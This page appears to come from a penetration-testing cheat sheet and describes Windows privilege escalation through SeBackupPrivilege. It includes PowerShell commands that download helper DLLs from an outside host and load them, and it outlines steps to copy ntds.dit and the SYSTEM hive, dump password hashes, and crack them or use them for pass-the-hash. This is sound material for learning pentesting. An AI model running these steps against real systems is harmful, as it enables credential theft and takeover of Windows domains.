Page cover

Windows PrivEsc with SeBackupPrivilege

SeBackupPrivilege allows users to retrieve file contents.

Investigation

First check if the current user has SeBackupPrivilege in the privilege information.

whoami /all
Copied!

If so, we can read arbitrary files on the system include administrator's files, SAML file, SYSTEM registry file, etc.

Exploitation (Read Sensitive Files)

1. Download & Upload Malicious DLLs

In local machine, download malicious dlls from here

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copied!

2. Copy & Read Sensitive Files

Exploitation (Retrieve Registry Keys)

1. Create a Payload and Transfer It

Create "diskshadow.txt" in local machine. It referes to this.

Upload this file to remote machine.

2. Execute DiskShadow.Exe

Then execute diskshadow.exe.

3. Upload Malicious DLL

We can download two dll files from here.

4. Dump Password Hashes

Now we have two files (ntds.dit and system) in local machine. We can dump password hashes using the files.

After that, crack the hashes or use them for pass-the-hash.

PreviousWindows PrivEsc with RemotePotatoNextWindows PrivEsc with Unquoted Service Path

Last updated